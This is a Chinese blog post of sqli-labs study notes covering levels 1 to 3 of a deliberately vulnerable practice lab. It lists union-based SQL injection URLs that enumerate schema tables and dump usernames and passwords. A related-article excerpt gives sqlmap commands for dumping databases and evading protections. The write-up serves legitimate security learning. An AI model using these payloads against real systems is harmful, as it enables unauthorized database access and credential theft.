sqli-labs学习记录(一)

最新推荐文章于 2025-05-03 18:13:21 发布
最新推荐文章于 2025-05-03 18:13:21 发布
阅读量1k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: sql-injection 文章标签: sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/csu_vc/article/details/78144133

0x01 less-1

‘$id’
单引号注入

这里写代码片
http://localhost/sqli-labs-master/Less-1/?id=14' order by 3-- +   //猜字段

这里写图片描述

http://localhost/sqli-labs-master/Less-1/?id=14' union select 1,2,3-- +  //查看内容

这里写图片描述
发现服务器依旧只返回了第一条查询的信息,这是因为后台有个mysql_fetch_array只执行了一遍,那如何绕过呢,就是把第一个查询置为空集。

http://localhost/sqli-labs-master/Less-1/?id=15' union select 1,2,3-- +  //id=0或者15都可以,因为测试了里面只有14项纪录,所以无论是0还是15第一行查询都是返回空集

这里写图片描述
只有第二列和第三列会显示在屏幕上,但是仅仅这两个位置并不够,因此需要用到数据库连接函数concat和concat_ws
concat_ws的第一个参数是连接字符串的分隔符。

http://localhost/sqli-labs-master/Less-1/?id=15' union select 1,2,concat_ws(char(32,58,32),user(),database(),version())-- +

http://localhost/sqli-labs-master/Less-1/?id=15' union select 1,2,concat_ws(char(58),user(),database(),version())-- +

记住常用的几个数据库函数

  • user()查询当前数据库连接使用的用户
  • database()查看当前数据库连接使用的数据库
  • version()查看当前数据库的版本
http://localhost/sqli-labs-master/Less-1/?id=15' union select 1,2,table_name from information_sche
ma.tables where table_schema=security-- +   //查询系统表

这里写图片描述
可以看到,这里用where是不可以使用英文的,具体的是编码原因,查询information_schema中的信息时,使用where语句值不能直接用英文

http://localhost/sqli-labs-master/Less-1/?id=15' union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479-- +  //使用16进制成功
http://localhost/sqli-labs-master/Less-1/?id=15' union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1-- +

只能返回一个table,这时就要用的limit了。limit用于限制饭回家过的范围
这里写图片描述
找我们最感兴趣的user表

http://localhost/sqli-labs-master/Less-1/?id=15' union select 1,2,column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 2,1-- +    //可以通过改变limit来枚举出user表有3个字段分别是id/username/password

0x02 less-2

$id

http://localhost/sqli-labs-master/Less-2/?id=0 union select 1,2,concat_ws(':',user(),database(),version()) -- +

http://localhost/sqli-labs-master/Less-2/?id=0 union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1-- +

http://localhost/sqli-labs-master/Less-2/?id=0 union select 1,2,column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1-- +

http://localhost/sqli-labs-master/Less-2/?id=0 union select 1,2,concat_ws(':',id,username,password) from users limit 2,1-- +

0x03 less-3

(‘$id’)

http://localhost/sqli-labs-master/Less-3/?id=0') union select 1,2,3-- +

http://localhost/sqli-labs-master/Less-1/?id=15' union select 1,2,concat_ws(char(58),user(),database(),version())-- +

http://localhost/sqli-labs-master/Less-3/?id=0') union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479-- +

http://localhost/sqli-labs-master/Less-3/?id=0') union select 1,2,column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273-- +

http://localhost/sqli-labs-master/Less-3/?id=0') union select 1,2,concat_ws(':',id,username,password) from users limit 2,1-- +
sqli-labs通关笔记
怪味巧克力的博客
05-19 558
文章目录Basic InjectionsLess-1 '字符型注入-联合查询Less-2 布尔注入-联合查询Less-3 字符注入-联合查询Less-4 字符注入-联合查询Less-5 字符注入-报错查询Less-6 字符注入-错误回显Less-7 文件读写Less-8 盲注和文件读写Less-9 盲注Less-10 盲注Less-11 单引号POST注入Less-12 双引号POST注入Less-13 双注入 - 字符型 - 变形Less-14 双注入 - 双引号 - 字符串Less-15 盲注/布尔
Sqli-lab教程-史上最全详解(1-22通关)
热门推荐
qq_52364123的博客
04-10 1万+
sql注入集合
网络安全:sql注入练习靶场——sqli_labs安装保姆级教程
最新发布
weixin_71914594的博客
05-03 1611
sqli-labs靶场是个开源的sql注入练习的综合靶场,包含大部分sql注入漏洞以及注入方式网络安全学习者可以通过在sqli-labs靶场练习提升对sql注入的理解,以及学习各种绕过姿势。以便更好的学习网络安全,有攻才有防,加强网络安全学习者对sql注入漏洞的攻击与防御。(本篇文章仅供网络安全学习学习,禁止任何未授权渗透攻击。
sqli-labs笔记
weixin_64183637的博客
08-02 356
sqli-labs闯关记录
sqli-labs Writeup
Yukikaze_cxy
05-30 298
【基础储备】=常用的url编码=%20 空格%22 "%23 #%27 '=字符串连接函数=concat_ws(字段1,字段2...)concat(字段1,字段2...)=mysql些函数=user():当前数据库连接使用的用户database():当前连接使用的数据库version():当前数据库的版本=information_schema库中常用的表=SCHEMATA:存储数据库的基本信息(...
sqli-labs writeup
a370793934的专栏
11-26 517
第1关 union注入 有报错 字符型注入 http://localhost/sqli-labs-master/Less-1/?id=1' 输入?id=1'报错 输入?id=1 and 1=1 正常 输入?id=1 and 1=2 正常 说明非数字型,为字符型,输入结果被两个单引号' '包裹起来 输入?id=1"正常 再次确认确实是单引号包裹 http://localhost/s...
sqli-labs靶场
05-30
"sqli-labs靶场"是个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
sqli-labs-php7-master.zip
04-06
在这个背景下,"sqli-labs-php7-master.zip"是个专为Web安全学习者设计的练习平台,它专注于SQL注入(SQL Injection)这重要的攻击手段。这个压缩包包含了个名为"sqli-labs-php7-master"的项目,用于模拟各种...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 、SQL注入基本概念与原理 - **定义**:SQL注入是种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
下面是基于SQLi-Labs的SQL注入基础知识点: 、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入般需要具备两个前提条件: 1. Web应用程序未...
从零记录sqli-labs学习过程 sqli-labs Less-3
fpxnb1的博客
03-24 2215
sqli-labs Less-3
sqli-labs(全通关刷题笔记)
读万卷书,行万里路。
01-15 2731
文章目录1 准备工作2 基础挑战(1-20)less-1less-2less-3less-4less-5报错注入布尔注入延时注入less-6less-7less-8less-9less-10Hackbarless-11less-12less-14less-15less-16less-17less-18less-19less-203 高级注入(21-37)less-21less-22less-23less-24less-25less-26less-26aless-27less-27aless-28less-2
sqli labs 1
yy2013
10-07 357
sqli lbas 1 数据库是mysqlsql 查询语句 : sql="SELECT∗FROMusersWHEREid=′sql="SELECT * FROM users WHERE id='id’ LIMIT 0,1”;在index.php?id=,构造可能的sql语句,通过判断是否存在sql注入sql语句 中的注释: – (注意要空格%20 或者是在后面写+) 1.
Sqli-labs--学习笔记
小人物的博客
05-15 339
数据库的连接函数:concat和concat_ws; concat_ws的第个参数是连接字符串的分隔符。 user():返回当前数据库连接使用的用户 database():返回当前数据库连接使用的数据库 version():返回当前数据库的版本 127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,2,concat_ws(char(32,5...
sqli_labs writeup
weixin_45769810的博客
07-28 246
Less-1 基于单引号字符注入 http://localhost/sqli_labs/Less-1/?id=1 and 1=2 正确,非数字型注入
SQLi Labs writeup (附py脚本)
Le0nis的博客
07-22 1972
less-1GET – 报错注入 – 单引号 – 字符型 PHP代码为: SELECT * FROM users WHERE id='$id' LIMIT 0,1 SQL实际语句为: SELECT * FROM users WHERE id='1' LIMIT 0,1; 1、判断注入 ?id=1
sqli-labs 学习过程——(持续更新)
hauzhao的博客
08-02 279
1
sqli-labs writeup(less1~30)
qq_64272648的博客
08-19 837
sqli-labs解题过程
sqli-labs闯关笔记(Basic Injections)
末初 · mochu7
05-05 1338
sqli-labs项目地址:https://github.com/Audi-1/sqli-labs Less-1 单引号报错注入GET 对传入的id参数单引号包裹,并且未作任何出参处理 对单引号闭合,联合查询注入即可 可以看下当传入payload是如何拼接闭合进行注入的 http://127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,user(...
sqli-labs靶场第关sqlmap注入
04-03
### SQLMap在SQLi-Labs关中的应用 对于SQLi-Labs靶场的第关(Less-1),可以通过`sqlmap`工具实现自动化的SQL注入攻击。以下是具体的操作方法以及注意事项: #### 工具准备 确保已安装并配置好`sqlmap`环境。如果尚未安装,可通过以下命令完成安装: ```bash git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap cd sqlmap ``` #### 基本操作流程 针对SQLi-Labs关的目标URL `http://localhost/sqli-labs/Less-1/?id=1`,可以执行如下命令来探测和利用漏洞。 ##### 探测可注入参数 运行以下命令以确认是否存在SQL注入漏洞,并定位到具体的注入点: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --risk=3 --level=5 --random-agent --batch ``` 上述命令中各选项的作用分别为: - `-u`: 指定目标URL。 - `--risk=3`: 设置风险级别为最高级,尝试更多复杂的payload[^1]。 - `--level=5`: 设定测试强度为最高等级,覆盖尽可能多的场景。 - `--random-agent`: 随机化User-Agent头信息,规避可能的安全防护机制[^2]。 - `--batch`: 自动处理所有交互式提示,默认选择推荐选项[^3]。 ##### 枚举数据库信息 旦确认存在注入漏洞,则继续深入挖掘敏感数据。例如枚举当前使用的数据库名称: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --current-db --batch ``` 此命令会返回当前正在使用的数据库名字。 ##### 列出所有可用数据库 为了进步了解服务器上的其他潜在资源,还可以列举全部数据库列表: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --dbs --batch ``` 通过该命令可以获得完整的数据库集合。 ##### 查找特定数据库内的表格结构 假设已经得知某个感兴趣的具体数据库名为`testDB`,那么就可以查询其内部包含哪些表单: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" -D testDB --tables --batch ``` 这里指定了目标数据库并通过`--tables`获取其中存储的数据表清单。 ##### 提取指定表的内容列定义 当明确了某张表之后,下步便是研究它的字段构成情况: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" -D testDB -T users --columns --batch ``` 这条语句用于揭示所选表(`users`)的各项属性描述。 ##### 导出实际记录值 最后步就是导出整张表里的真实数据条目了: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" -D testDB -T users --dump --batch ``` 至此完成了从发现漏洞直至提取有用情报的系列动作。 ### 注意事项 尽管`sqlmap`功能强大,但在实战环境中需谨慎行事,避免触犯法律红线。仅限于授权范围内的渗透测试活动才允许使用此类技术手段。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值